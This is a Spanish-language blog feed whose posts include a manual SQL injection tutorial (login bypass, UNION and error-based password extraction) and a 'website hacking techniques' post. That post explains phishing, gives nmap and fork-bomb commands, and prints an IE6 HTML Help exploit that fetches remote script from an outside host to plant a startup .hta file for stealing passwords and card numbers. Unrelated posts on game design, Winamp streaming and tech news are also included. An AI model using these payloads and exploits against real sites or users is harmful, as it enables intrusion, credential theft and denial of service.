WF-Zone - Bolivia

Inyeccion MISQL (MANUAL)

wf-zone — Mon, 15 Oct 2012 18:14:56 GMT

Tutorial de Inyección SQL. (SQL Injection)

La
inyección SQL es el ataque vía web, que aprovecha errores en la
filtración de datos introducidos por el usuario, y que permiten a un
atacante, tener control de cierta aplicación.

ATENCIÓN

Para poder explotar con exito una falla de inyección SQL es necesario que sepan con anterioridad el lenguaje.

información sobre su implementación en PHP se puede encontrar en
http://php.net/mysql
http://dev.mysql.com/

Los
ataques SQL pueden ser evitados de muchas formas, iniciare con algunos
ejemplos de instrucciones vulnerables, con las "magic quotes”
desactivadas.

Ejemplo 1

Código:

$us=$_POST['usuario'];
$pass=$_POST['pass'];
$sql="SELECT * FROM usuarios WHERE user = '$us' AND password='$pass'";

-- código largo cortado --

Código:

if(mysql_fetch_array($exc)){
echo "Inicio de sesión correcto"; // Esto fue modificado
}

Este es el tipico sistema de verificacion de contraseñas..
utiliza
la instruccion mysql_fetch_array(funcion de mysql, que devuelve falso
si no hay ningun resultado, en la 'querry', o petición), asi que si no
hay ningun resultado donde el usuario y el password conuerden, el
resultado es false .

como podemos hacer que no devuelva false??

Con el password correcto
Haciendo trampa

Logicamente, no usaremos la primera opción xD

Haciendo trampa.. se haria algo asi:
esta es la petición que solo nos deja pasar si sabesmos el pass..

SELECT * FROM usuarios WHERE user = '$us' AND password='$pass'

ahora,
¿como se puede hacer que nos devuelva true aunque no sepamos el
password, sabiendo que solo podemos modificar $pass y $us?
Supongamos que ponemos de usuario Pegaso, y de password pjps.
El usuario existe, pero no sabemos el pass..
la sentencia que SQL recibira sera:

SELECT * FROM usuarios WHERE user = 'Pegaso' AND password='pjps'

y como no hay ningun campo donde el usuario y el password coincidan, nos devolvera false

Ahora, con un poco de creatividad:
de usuario: Pegaso
de password: ' OR ''='

la sentencia SQL recibira:

SELECT * FROM usuarios WHERE user = 'Pegaso' AND password='' OR ''=''

nos
devolvera true, si hay algun resultado y como NADA siempre es igual a
NADA, nos devolvera true, y pasamos el mecanismo de validación como
Pegaso.

Otros posibles valores que devuelven true son:

usuario: Pegaso AND /* password: */ ''='
usuario: ' OR 1=1 //

Ahora...
que si quisieras saber el password.. (te advierto, que normalmente esta
cifrado, y deberas desencriptarlo, con alguna herramienta para eso como
john the ripper), tomemos el siguiente ejemplo

Ejemplo 2

Código:

$us=$_POST[‘usuario’];
$pas=$_POST[‘pass’];
if($_GET['usuario'] || $_GET['pass']){
die("Hack Attempt");
}
$sql="SELECT password FROM usuarios WHERE user = '$us'";

-- código largo cortado --

Código:

$resp = mysql_query($sql) or die(mysql_error());
if(mysql_fetch_array($resp)){
if($resp==$pas){
echo "Inicio de sesión exitoso"; // Esto fue modificado
}else{
echo "el password $resp es incorrecto";
}
}

Bien, este ejemplo, que se ve mucho mas seguro (y sacado de una aplicación real), ¿es vulnerable?
SI, ¿porque?
Ya
quedamos en que no hay magic quotes, las magic quotes son una función
que trata de desactivar todas las cadenas introducidas por el usuario,
que parezcan peligrosas, como comillas, diagonales, \0 etc..
el
webmaster pensó, que como no usaba el mysql_fetch_array, entonces no
podian usar un ' OR ''=', como la inyección clasica, pasada.

Ahora, queremos sacar el password.. pero.. ¿como?

Hay una instruccion en SQL llamada UNION, que sirve para obtener información de 2 tablas, o..
Bueno.. UNION necesita algunos requisitos.

Necesitas meter la misma cantidad de valores que tiene la tabla.
Tener un informe de los errores que provocaremos en la instrucción

Bien ahora empezemos.
la instrucción a modificar es la siguiente:

SELECT password FROM usuarios WHERE user = '$us'

como ejemplo, si colocalmos de usuario: zanahoria
la instrucción que llega seria:

SELECT password FROM usuarios WHERE user = 'zanahoria'

Otra vez necesitamos creatividad
regresemos al UNION.

UNION necesita que el numero de columnas sea igual, sino sacara un error.

y exactamente, lo que necesitamos es un error, que nos diga cuando estamos mal, para saber cuando estamos bien.

el UNION se usa de esta forma:

usuario: ' AND 0 UNION SELECT 1 AND 'l'='
SELECT password FROM usuarios WHERE user = '' AND 0 UNION SELECT 1 AND 'l'=''

para lo cual SQL nos respondera:

Citar

The
used SELECT statements have a different number of columns:SELECT
password FROM usuarios WHERE user = '' AND 0 UNION SELECT 1 AND 'l'=''

Continuando
por el mismo camino, podemos hacer que nos regrese un error, al tratar
de UNIR un campo de tipo INT (osea que guarda numeros) a un CHAR (guarda
letras)

Quedaria algo asi:

' UNION SELECT MIN(Password),2,3,4,5 FROM usuarios WHERE user = 'zanahoria

la sentencia seria esta:

SELECT password FROM usuarios WHERE user = '' UNION SELECT MIN(Password),2,3,4,5 FROM usuarios WHERE user = 'zanahoria'

que nos da como error:

Citar

Syntax error converting the varchar value 'naranja' to a column of data type int.

donde el password es naranja 8) 8)

Las inyecciones ultimamente han logrado tener mas poder que antes, segun el blog de acidbits,
solo debemos sacar toda la información posible, y con un poco de
esfuerzo, conseguimos tener control de archivos (crear, borrar, etc..).

el siguiente es un ejemplo, con la misma sentencia
usuario:
' AND 0 UNION SELECT 1,user(),3,4,5 AND 'l'='

y nos regresa:

Citar

Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'

que significa esto? que estamos metiendo valores en utf cuando debe ser en latin1.. eso lo arreglamos asi:

' AND 0 UNION SELECT 1,convert(user() using latin1),3,4,5 AND ''l='

y eso nos regresa:

Citar

root@localhost

esto, no es todo, con hacer que regrese valores con '
Para ver el metodo completo de acidbits, da click aquí.

Ejercicio :
¿Que puedes hacer con esta sentencia?

Código:

$sql="UPDATE clicks set dat=now(), aas=aas+1 where  ref='$HTTPREFFERER'";
$resp = mysql_query($sql) or die(mysql_error());

Coloca
el archivo anexo en tu servidor, con las respectivas configuraciones
SQL necesarias, en una carpeta protegida, e intenta autohackearte, eso
te dara practica.

Proximamente:
Blind SQL Inyection

Citar

© Sirdarckcat 2005
Autorizo
la reproducción total o parcial de este documento bajo los terminos de
la licencia de documentacion libre de GNU, una copia puede ser
encontrada en http://www.gnu.org/

Creando un Videojuego

wf-zone — Mon, 15 Oct 2012 17:58:10 GMT

Introducción

Este
es mi primero manual ya que siempre me ha gustado mas leer que escribir
la gente me ha ayudado mucho con sus manuales ha si que espero ayudar
yo también .En el foro hay recopilada mucha información pero un poco mas
nunca va mal verdad .Voy a intentar explicar los pasos a seguir para
crear un videojuego ya que cuando empecé busque en el foro y las ideas
eran generales, nombraban programas y cosas así pero no mucho mas. Por
eso quiero dejar las ideas mas claras. Ahora he mirado y hay más
información pero con este manual estará todo mas junto y claro o eso
espero.
Bueno empecemos el manual.

1-Las Ideas Claras

Las ideas deben tenerse claras antes de empezar.

La idea del juego:
Bueno siempre es bueno crear un juego innovador pero ya hay tantos
creado que normalmente ahora lo que hacen es mejorarse los juegos por
ejemplo Age of Empire, Imperium y así muchos otros que eligen un campo y
intentan mejorar el juego. Lo primero que tenemos que hacer es pensar
de que tratara nuestro que juego que modalidad de juego será terror,
rol, guerra, etc.

La Historia: Como mejor y mas
entretenida sea la historia mejor porque la gente se enganchara al juego
y todos hablaran del juego ya que les parecerá muy interesante la
historia la mejor historia en la que me e embarcado ha sido Zelda aun
recuerdo ese juego como el mejor y todo gracias a su historia.

Tipo de Juego: Con tipo de juego me refiero a si será 2D o 3D.Siempre es mas espectacular crear un juego en 3D no les parece.

Sistema de Visualización:
Me refiero en si será en primera persona en tercera persona a esas
cosas hoy en día los juegos lo que hacen es tener la posibilidad de
poder poner el sistema de visualización que uno quiera por ejemplo el
pro 6 tiene un montón de cámaras para elegir.

Complementos del Juego:
Como mas complementos pongamos en el juego mas llamara la atención del
jugador por ejemplo si es un juego de disparos como mas armas tenga para
elegir o comprar el jugador mas llamara su atención no creen a si que
es aconsejable pensar una gran variedad de componentes para nuestro
juego.

2-Organización

Bueno
lo primero de todo y para mi es un paso muy importante es organizar el
proyecto. La organización de un juego en toda regla a mi parecer consta
de los siguientes apartados que serán explicados más detalladamente mas
adelante.

1-Diseño

2-Programación

3-Audio

4-Guión

La
idea es planificar unos tiempos limites unas fechas unos trabajos etc.
Bueno como se organizaría cualquier otro proyecto en general.

Hay
que tener en cuenta que estos proyectos se realizan en grupo
normalmente y a mi parecer es mejor aunque mas difícil de organizar pero
mucho mejor porque al final puede quedar un mejor trabajo. Por eso
siempre hay alguien que se encarga de organizar a la gente para que no
haya problemas y cada uno realice su tarea.

3-Empieza el Trabajo

Voy ha separar el trabajo en 4 su apartados al cual dos de ellos en este articulo no se les dará importancia.

1-Diseño
El diseño se divide en 4 partes importantes en la creación de un juego.

2D-La
primera parte será el 2D contado que nuestro juego fuera 3D siempre hay
complementos 2D que deben diseñarse como por ejemplo los logotipos del
juego las barras de vida las balas siempre suelen ser diseñadas en 2D.
Es mucho mas sencillo y es lo que siempre se ha usado por ejemplo en el
Counter toda la información del jugador es en 2D.
Para este trabajo
se utilizan herramientas como el Photoshop principalmente es la
herramienta mas conocida hoy en el mercado yo la recomiendo.
Aquí tiene la URL del producto

http://www.adobe.com/es/products/photoshop/

Tambien esta el Paint Shop Pro aquí teneis mas información acerca de este programa:

http://www.corel.com/

3D-Todo
lo restante debe ser diseñador en 3D los personajes el entorno también
podría ser realizado en 2D pero no seria lo mismo hay gente que dice
que un juego 2D puede ser muy bueno y es verdad pero no hay nada como un
buen juego 3D.
Para el diseño 3D podríamos usar una gran variedad de programas.

3D Studio Max- Es para mi uno de los mejores es el que yo usaría para la creación del juego.
Aquí teneus un buen manual-> http://www.unav.es/cti/manuales/3DStudioMax/indice.html

Cinema 4D

Maya

Poser

Bryce

Yo recomiendo el 3D Studio Max la última versión la 8 esta muy bien el programa.

Animación-Casi
todos los programas de creación de objetos 3D incluyen su propio
animador consiste en dar movimiento a las figuras creadas para que
tengan movimiento y parezcan tener vida XD. Aunque también hay
herramientas especializadas para eso como Character Fx podeis
encontrarlo y descargarlo aquí:

http://www.insanesoftware.de/

Texturización-Es
para mi lo mas complicado consiste en veamos como diría yo pintar los
objetos 3D pero con imágenes 2D es algo difícil para mi y desconozco.
Casi todos los programas de modelado incluyen uno si alguien quiere
puedo hacer un manual incluido aquí mismo de texturización
El Deep Paint es un buen programa para texturizar. Mas información aquí.

http://www.righthemisphere.com/

2-Programación

Bueno
este es un apartado muy importante y uno que me gusta mucho veamos para
crear un juego hay dos maneras de hacerlo hablando en el ámbito de la
programación o al menos yo conozco dos una es usando el lenguaje todo
código por ejemplo C++ y usar una librería de creación de videojuegos
como Open Gl o DirectX de Microsoft o Allegro para empezar yo
recomendaría Allegro. Pero después hay otra manera mas sencilla y es
usar una engine de creación de videojuegos voy a nombrar algunas.

Blitz 3D- Es la que yo recomiendo para empezar es muy sencilla de entender es algo así como el VB.

http://www.blitzbasic.com/Products/_index_.php -> Aquí esta el programa os podeis bajar una versión de prueba si queréis.

DarkBasic Pro-Otra herramienta para la creación de videojuegos muy buena.

http://www.darkbasic.es/

XNA-Es
la herramienta que ha liberado Microsoft permite crear juegos para pc y
xbox 360 aun hay poca información pero es muy buena herramienta. Es una
que particularmente me ha llamado la atención usa el lenguaje C#.

Bueno
ahora imaginémonos que tenemos todo lo diseñado en una carpeta por
ejemplo llamada Juego. Entonces con la programación lo que haces es ir
llamando a cada elemento por orden y imprimirlo en pantalla. Y cada uno
ya tiene su movimiento el apartado de programación es mucho mas
complicado que esto de ir poniendo cada elemento pero para que lo
entendáis lo pongo así luego lo iré ampliando.

Este manual podrá ser distribuido siempre dando a conocer el autor yo Isirius.

Autor-Isirius

Creando un Videojuego

Montar una emisora y poder emitir por la red utilizando tu Winamp

wf-zone — Mon, 15 Oct 2012 17:53:44 GMT

Para montar una emisora y poder emitir por la
red utilizando tu Winamp lo primero que tienes que hacer es bajarte el
Winamp v5.0 o el v2.81 (con otras versiones no puedo asegurarte que
funcione y la versión 3 puedo asegurarte que no lo hará) así como el
Plugin que te permitirá convertir tu Winamp en una emisora online. Ambas
cosas las puedes descargar de la Web que sale en mi firma.
Bien pues
una vez que tengas instalado el Winamp instalas la emisora, para ello
ejecutas los dos archivos con extensión *.exe que estarán en el zip de
la radio para Winamp y en el menú "Inicio" y en "Todos los programas"
busca "Programs" si si no lo e escrito mal y allí busca "SHOUT Cast
DNAS" y ejecuta "SHOUT Cast DNAS (GUI)" con lo que se te abrirá una
ventana como esta

que
solo para que no te moleste puedes cerrar picando en la X de la derecha
y se minimizara en la barra de herramientas junto al reloj y para
cerrarlo del todo tendrás que picar en "Kill Server" y picar en "Si” en
el recuadro que confirmación que saldrá, pero eso será cuando quieras
dejar de emitir claro. A continuación abre tu Winamp y ve a "Opciones”
después a "Preferencias" y selecciona "Plugins" y luego "DPS/Efectos"
allí veras que en la parte derecha te sale algo así como "Nullsoft
Soutcast DSP v1.8.2b [dsp_sc.dll]" puedes verlo en esta imagen

pues as doble clic sobre ello con lo que se te abrirá una ventana como esta

y
ya podrás si lo deseas cerrar la ventana de preferencias del Winamp,
entonces picas en la pestaña "Output" y después picas en el botón
"Connect" con lo que ya as empezado a emitir a la red y en el botón que
antes ponía "Connect” ahora pone "Disconnect”

Ahora
ya solo tienes que reproducir la música que desees en tu Winamp y será
emitida a la red al mismo tiempo que tu la oyes. Para que otra persona
(hasta un total de 32) pueda oír tu emisión debes darle tu IP seguida
de: 8000 que es el puerto por el que emite tu emisora con lo que
quedaría por ejemplo así: 81.41.137.33:8000 donde 81.41.137.51 es tu IP
y: 8000 es el puerto.
Pues bien la persona que desee oír tu emisión
tiene que abrir su Winamp (cualquier versión) y presionar
simultáneamente las teclas Control y L e introducir en el cuadro que se
les abrirá la combinación de IP y puerto que tu les comuniques y picar
en el botón "Abrir" con lo que comenzaran a escuchar tu emisión.

Después
para detener la emisión solo tienes que en la ventana de preferencias
del Winamp (que si la cerraste tendrás que volver abrir) seleccionar en
vez del "Nullsoft Soutcast DSP v1.8.2b [dsp_sc.dll]" seleccionar
"Ninguno" como puedes ver en esta imagen

y picar en el iconito del Server que esta junto al reloj para maximizarlo y picar en "Kill Server" como dije antes.

----------------------------------------------------------------------

Para emitir lo que uno hable por el micro es lo que se puede ver en la ventana del shout cast osea esta:

Picar
en la pestaña "Input" y en "Input Configuration" seleccionar "Soundcard
Imput", y en "Soundcard Mixer" marcar la casilla "Microphone" y con
esto ya estas emitiendo lo que hables por el micro en vez de lo que
reproduces con el winamp.

FUENTE DE LA PARTE DE LA EMISIÓN DE LA VOZ DEL MICRO: http://www.mundocracke.net/~sardiweb/foro/index.php?board=11;action=display;threadid=99
Saludos...

Tecnicas de Hackeo de Sitios Web

wf-zone — Mon, 15 Oct 2012 17:44:14 GMT

Ahora
bien, quizás estas leyendo esto porque quieres hacerte una idea de cómo
se hackea un sitio. Existen varios niveles y técnicas de hackeo:

Change Coding Este tipo de hackeo es muy divertido y, la mayoría de
las veces, inocuo. Se trata simplemente de modificar el código que
despliega una página de Internet agregando órdenes en javascript o VB Script desde la barra URL del navegador. Incluso la elemental página de Google ha sufrido este tipo de hacking.

SQL Injection Como habrás notado, muchos sitios en la red muestran una caja de "Buscar" o "Search". En SQL el punto y coma (
funcionan como el fin de comando y el doble guión (--) como comentario.
Si sabes el nombre de la tabla (o intentas adivinarlo) donde se guardan
los passwords de los usuarios puedes jugar un poco enviando cosas como:
UPDATE users SET password="hack"; este tipo de hackeo es muy
entretenido (horas y horas de sana diversión ;-) ) y te sorprenderás del
hecho de que incluso sitios de grandes empresas internacionales no
poseen ningún sistema de filtrado. SQL Ruleezzz!!!

Phising "password harvesting fishing" (cosecha y pesca de
contraseñas) es una técninca que consiste en duplicar (hasta en el más
mínimo detalle) un sitio web verdadero en nuestro propio servidor.
Debemos ir a Hotmail, Gmail, Yahoo!, etcétera, ver el código HTML y
guardarlo en nuestro propio server. Luego enviamos un email a la persona
de la cual deseamos su clave con algo como "Alguien muy especial te ha
enviado una Ciber-tarjeta, haz click aquí" y lo enviamos a nuestro
propio Webserver en Linux. El usuario cree que está entrando en la
página de inicio de Hotmail e introduce su login y password, ¡pero ahora
es nuestro!

Dictionary's attack Existen personas (y administradores de sistemas)
que piensan que por usar palabras como "fanerogama"o "porfirogeneta"
como password, nadie los podrá adivinar. Pero en realidad esas palabras
existen en cualquier diccionario, y los diccionarios que sirven para
revisar la ortografía en los procesadores de texto como AbiWord, también
pueden ser usados para intentar logearse dentro de un sistema ajeno.
Existen scripts que usan cada palabra de los diccionarios en español,
inglés, francés, finlandés, turco, etc. para hacer un login. Estos
scripts pueden tardarse mucho tiempo haste encontrar un password que
corresponda a la palabra y cuando lo hacen, envian un email al hacker
para avisarle cual palabra es un password. Los hackers que se consideran
a sí mismos elegantes y creativos sienten aversión por este tipo de
hackeo pues en el simplemente se aplica la fuerza bruta (y la
paciencia).

buffer overflow (o simplemente overflow). Los programas se almacenan
en buffers (secciones contiguas de memoria), bajo ciertas
circunstancias los datos que se envían al buffer sobrepasan su capacidad
y la memoria se "desparrama", generalmente esto provoca que el programa
colapse pero muchas veces, durante una pequeña fracción de segundo, la
información enviada al buffer puede ejecutarse con los permisos del
usuario dueño del proceso. El hacker (que debe conocer bien C y
ensamblador) aprovecha esto, envía muchos datos al buffer, para
desbordarlo y ejecutar código malicioso. Existen pocos hackers con el
suficiente talento como para aprovechar un overflow recién descubierto,
el problema es que luego de un par de semanas de conocido el exploit,
comienzan a aparecer en la red scripts que automatizan el hackeo y todos
los script kiddies comienzan a ejecutarlos. Solución: coloque un
"apt-get -f -y dist-upgrade" en el cron y manténgase informado.

A los errores en la programación se les conoce como "bugs" o bichos,
la mayoría de los bugs sólo hacen que los programas no funcionen como
deben pero algunos pueden ser aprovechdos para violar la seguridad, a
estos bugs se les conoce como "exploits". Es decir, no todos los bugs
son exploits pero todo exploit es un bug.

Denegation of Service o DOS La denegación de un servicio implica que
el hacker ha aprovechado un bug en un programa para " tirar" un
servicio del servidor. Generalmente se trata del Webserver. El IIS de
Microsoft es particularmente vulnerable a este tipo de ataques. Tanto el
Change Coding como el DOS son hacks relativamente benévolos pues no
implican (necesariamente) a un intruso en el sistema.

Aplication level Esto ya es más serio, alguien se ha apropiado de
una aplicacón del sistema. La mayoría de las veces se trata de una
aplicación Web como PHP-Nuke o MyAdmin. Sin embargo en ocasiones el
dominio de una aplicación conduce a tener más accesos y facilidades en
el hackeo.

Root hacking Este es el hack más grave, el hacker ha tomado el
control del sistema y puede hacer lo que quiera con él. Generalmente el
hacker tratará de pasar desapercibido y creára un usuario con todos los
derechos para entrar cuando quiera al sistema y regodearse de lo poco
hábil que es el administrador.

Hay que considerar que muchas veces no existe una diferencia clara
en estos niveles. Muchos hackeos al root empezaron siendo un simple
juego de Cross Scripting con el cual el hacker obtuvo el password de
PHPNuke, con lo cual se hizo con el password de Mysql y dado que era una
versión no actualizada de Mysql, ejecutó un overflow con el que se hizo
root. Si detectamos un root hacking lo primero es desconectar el equipo
de la red, hacer un análisis forense de los paso del hacker, respaldar y
formatear el disco duro incluyendo el MBR. Muchos administradores se
sienten avergonzados y reinstalan el sistema rápidamente y sin decirle a
nadie que ha sido hackeado. Esta es una actitud equivocada, sea humilde
y reconozca que ha sido vencido en buena lid. Infórmele a sus colegas y
hagan juntos el análisis de cómo fue que el intruso entró y como
mejorar las políticas para que eso no vuelva a ocurrir. Un hacker puede
enseñarle muchísimo sobre seguridad, aún cuando no hubiese tenido
ninguna intención de ello.

Cross Scripting, o XSS, es una técnica de hackeo que consiste en
enviar información maliciosa a través del browser. En versiones
anteriores de Internet Explorer era suficiente con colocar

?op=userinfo&uname=
En el URL para ver la información de otros usuarios en un sitio de ventas por Internet.

Generalmente todo ataque comienza con nmap, este es un programa de
escaneo de puertos. El escaneo de puertos permite conocer que sistema
operativo y que servicios posee un servidor de la red. Si no tiene nmap
instálelo con apt-get. Algunas opciones de escaneo de nmap sólo pueden
ejecutarse como root:

# nmap -sS -sV -P0 www.algoaqui.com

Lo que verá, luego de un minuto de espera, será la lista de los
servicios y el programa que los ejecuta (Apache, Qmail, SSH, vsFTP,
etcétera). ¿Cómo funciona nmap?, bueno, es como si arrojara piedritas a
las ventanas de una casa para ver quién se asoma y cómo es. De la misma
manera nmap envia miles de peticiones de distintos tipos (TCP/UDP) a
todos los puertos del servidor esperando que alguien le conteste. Los
programas creen que alguien los está llamando pero nmap no mantiene
contacto: sólo quiere saber si hay alguien en esa ventana ;-). De esta
manera muchas herramientas pensadas para detectar intrusos nunca se
enteran que nmap estuvo husmeando por sus puertos.

En la película Matrix se puede ver a Trinity usando Nmap para hackear un exploit de la versión 1 de SSH:

Tenga cuidado, en Estados Unidos y varios países de Europa el
escaneo de puertos es un delito y varias corporaciones se han tomado muy
en serio seguirle la pista de los husmeadores y acusarlos con su
proveedor de internet. De hecho, si usted frecuenta el sitio de nmap y
sus listas de correo, seguramente su nombre ya está en alguna base de
datos del FBI. Por supuesto, como muchas otras leyes, estas leyes son
idiotas: sin gente escaneando puertos y tratando de entrar a los
sistemas aún estaríamos usando Windows 3.11. El mundo tiene una deuda
con los hackers que se niega a reconocer, sin ellos el comercio
electrónico hubiese sido imposible. Si usted está en América Latina no
se preocupe, nuestros legisladores ni siquiera saben (ni les interesa
saber) qué es un escaneo de puertos.

Una vez que sepas que programas se están ejecutando realiza una
busqueda en google sobre algún exploit relacionado. En todos los
programas, tarde o temprano, se descubre una vulnerabilidad, con suerte,
el admistrador del servidor no ha actualizado en semanas o meses y tú
puedes intentar entrar. Existen muchos scripts, sobre todo de Perl, que
intentan hackear un sitio sólo ejecutándolos, hay mucha gente que no
tiene idea de cómo funcionan estos scripts y simplemente los ejecutan
hacia un servidor. Cada tres o cuatro días en mi log de Apache aparece
alguien que corrió uno de esos scripts... ¡que eran para IIS! A estos
soterutanos se les conoce como Script Kiddies y conforman un vergonzoso
tipo de lamer.

Si entras a un IRC preguntando sobre cómo aprender a hackear, algún
inconsciente, por jugarte una broma, te dirá que hace poco él descubrió
una forma de tirar el sitio de Microsoft y te pedirá que escribas en el
shell:

# nmap-O www.microsoft.com && : (){ : |:& };:

¡No lo hagas! tu sistema se congelará por falta de memoria y la
única manera de "destrabarlo" será reiniciar todo el equipo con el botón
de reset del CPU.

Un hack que está de moda es un hoyo crítico de seguridad en el IE 6
de Windows XP, este hoyo está presente incluso si se tiene el Service
Pack 2 y afecta tanto a la versión Home, como la "Professional"
(Microsoft gastó cientos de millones en el SP2 pero al parecer de poco
sirvió). Fijate en la siguiente página sp2rc.html:

classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%

style="position:absolute;top:140;left:72;z-index:100;"

codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">

value="command;file://C:\WINDOWS\---PCHealth\HelpCtr\System\blurbs\tools.htm">---
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%

style="position:absolute;top:140;left:72;z-index:100;"

codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">

localpage.HHClick();

setTimeout("inject.HHClick()",100);

El objeto id: localpage (que posee un formato de extensión de los
archivos de ayuda de Windows) le dice a hhctrl.ocx que abrá una ventana
de ayuda para C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm (un
archivo normal del sistema que está en todos los Windows XP).

El segundo objecto id: inject llama al script hospedado en
www.mononeurona.org/writehta.txt que inyecta el código remoto de este
archivo, haciendo un XSS típico. El archivo writehta.txt contiene
instrucciones maliciosas para crear un objeto ADODB.Connection:

Dim Conn, rs Set Conn = CreateObject("ADODB.Connection"
Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _
"Dbq=http://www.mononeurona.org;" & _ "Extensions=asc,csv,tab,txt;"
& _ "Persist Security Info=False" Dim sql sql = "SELECT * from
foobar.txt" set rs = conn.execute(sql) set rs
=CreateObject("ADODB.recordset"
rs.Open "SELECT * from foobar.txt", conn rs.Save "C:\Documents and
Settings\All Users\Start Menu\Programs\Startup\ Microsoft Office.hta",
adPersistXML rs.close conn.close window.close

Este archivo es usado para ejecutar un query SQL: sql = "SELECT *
from foobar.txt", donde foobar.txt es hospedado en el servidor FTP del
atacante (el cual está configurado para permitir el acceso anónimo). El
resultado del query se salva en el archivo C:\Documents and Settings\All
Users\Start Menu\Programs\Startup\Microsoft Office.hta.

El objeto ADODB y el archivo foobar.txt también pueden ejecutarse
colocándolos escondidos como si fuesen una imagen: src="malwarez6.mcb" border="0"> todos los antivirus están configurado
para no escanear los archivos de imágenes de modo que podemos colarnos
con facilidad al sistema.

Practicamente no hay límites en lo que uno puede guardar en este
archivo hta y además, como se guarda en el menú "All Users" se ejecuta
cada vez que un usuario se logea en Windows XP. Por supuesto lo primero
que una persona maliciosa haría sería buscar los números de tarjetas de
crédito y los password de todo el sistema ¡Gracias Microsoft!

Y todo esto lo hemos hecho sin que el usuario tuviese que recibir un
email o apretar un botón, simplemente entrando a la página sp2rc.html.
Miles de páginas en Internet tienen este código y si usted usa Internet
Explorer 6 para navegar seguramente ya tiene el archivo hta en su disco
pues los antivirus no lo detectan. Como digo, este código está muy de
moda, y al parecer no habrá parche hasta finales del 2005. Los que usan
[[http://www.mozilla.org/products/firefox/ Mozilla-Firefox]] en XP están
a salvo, pues este código no les afecta ;-). De cualquier manera si se
ve a obligado a usar Windows XP por la necesidad de usar CorelDraw o
Autocad no navegue en este sistema operativo. Al terminar de usar ese
programa, bootee a Linux (porque tiene Linux ¿verdad?) y desde ahí
navegue, consulte su email y use Messenger.

Si tú, como muchos de nosotros, tienes un servidor Linux en la red, estos son los consejos básicos de seguridad:

1. Instala lo mínimo indispensable Realiza un deborphan cada tanto, no instales samba en un equipo que tiene webserver.

2. Usa password alfanuméricos Mezcla números y letras como
caktus90 o 8qwer9. No uses passwords de palabras que están en el
diccionario. No uses un password del sistema para suscribirte a una
lísta de correo o un foro.

3. No instales Telnet y FTP Prefiere SSH y un servidor FTP sobre
SSL como vsFTP. No permitas accessos remotos del root por SSH. Permite
un solo usuario en AllowUsers para evitar ataques de diccionario. Trata
de encriptar todo lo que entre al sistema, incluyendo el correo.

4. Actualiza cada semana De preferencia realiza las
actualizaciones de noche, si apt-get sugiere instalar un nuevo archivo
de configuración en lugar del que estás usando prefiere el que trae el
paquete, muchas veces el problema no es el programa sino la
configuración.

5. No instales las X Un servidor no siquiera debería de tener monitor, todo debe hacerse a través de SSH.

6. Enjaula los demonios Corre apache, OpenSSH y la base datos de datos "enjaulados" en un chroot.

7. Watch Log Instala un reporteador de logs que te envie un
reporte general del sistema cada tres días, hay mucha información útil
en los logs que se pierde por no saber extraer la información.

8. No instales compiladores Si necesitas compilar un nuevo
kernel, desinstala gcc y el paquete libc6-dev luego de bootear con el
nuevo kernel.

9. Suscríbete a una lista de anuncios de seguridad Existen
muchas, también puedes visitar sitios como [[http://www.cofradia.org/ La
cofradía]] donde se anuncian bugs de seguridad y cómo corregirlos.

10. Nmap on myself Una forma de descubrir si un troyano ha abierto
un backdoor es correr nmap contra nuestro propio servidor. Así te darás
una idea de lo que un hacker (o cracker) vería si escanea tu servidor.

11. Apache mod_security No sé porque este magnífico módulo no
viene por omisión pero practicamente todos los Cross Scripting quedan
anulados con él.

12. MVC El model view controller no sólo sirve para separar el
diseño de la programación sino que incrementa la seguridad. Si estas
haciendo una aplicación web con python, php o perl crea una clase para
la base de datos que guarde los valores, cierra la base de datos y
después inserta los valores en el código XHTML.

No hackeamos cuentas de hotmail.com, no preguntes como ser un
hacker: instala Linux en tu equipo con el Webserver, programa en Perl y
serás un hacker. yO se ke muchos no entenderan nada!!

Anonymous lanza nuevas amenazas contra Sony

wf-zone — Tue, 24 Jan 2012 23:53:30 GMT

El apoyo de Sony a la aprobación del proyecto de ley contra la piratería online en Estados Unidos denominado Stop Online Piracy Act (SOPA Act) están levantando críticas en Anonymous. Con un mensaje de voz robótica, la organización amenaza a la firma con volver a atacar sus servidores.

Las amenazas de Anonymous se extienden además a Justin Bieber, Lady Gaga y Taylor Swift, entre otros. En el mensaje dicen además: Para
quienes han dudado de nuestro potencial: nos hemos infiltrado en los
servidores de Bank of America, en el Departamento de Defensa de los
Estados Unidos, en las Naciones Unidas. En un solo día.

Via: Clehider Noticias

Apple trabaja en baterías para teléfonos móviles inteligentes que durarán semanas

wf-zone — Tue, 27 Dec 2011 23:11:06 GMT

La compañía Apple está trabajando en una nueva batería alimentada con células combustibles de hidrógeno.
De esta manera, los dispositivos -tanto smartphones como tablets
y ordenadores portátiles- dirían adiós a las "grandes y pesadas"
baterías que existen en la actualidad para dar paso a otras más ligeras y
que además pueden durar semanas sin necesidad de recarga.

Apple sigue investigando para mejorar sus dispositivos. Pese a que
los modelos de la compañía de Cupertino en el mercado están a la
vanguardia en cuanto a diseño y tecnología, Apple quiere seguir
evolucionando ya que las baterías son aún un punto muy flaco de los smartphones. Y para ello la compañía está trabajando en varias patentes.

Una de las últimas que se han conocido está relacionada con un nuevo concepto de batería, tanto para ordenadores como para dispositivos móviles. Esta patente -presentada ante la Oficina de Patentes y Marcas de EE UU-
revela que las nuevas baterías estarían compuestas por células
combustibles de hidrógeno, capaces de convertir el hidrógeno y el
oxígeno en agua y energía eléctrica.

De esta manera, la capacidad de la batería sería mucho mayor, pasando semanas para volver a recargarla, y no sería perjudicial para el medioambiente.
Además, según señala Apple en su patente, estas células al ser
minúsculas pueden hacer que las baterías de los dispositivos sean más
pequeñas y ligeras.

"Estas células combustibles pueden alcanzar altas densidades de
energía, lo que potencialmente puede permitir el uso continuado de
dispositivos electrónicos portátiles durante días o incluso semanas sin necesidad de que sean recargados", asegura Apple.

Esta nueva patente de la compañía de Cupertino se une a los trabajos
anteriores que Apple ha estado realizando, también relacionados con la
mejora de las baterías de sus dispositivos.

Via: 20minutos

Una empresa denuncia a un exempleado por llevarse a los seguidores de Twitter

wf-zone — Tue, 27 Dec 2011 22:56:36 GMT

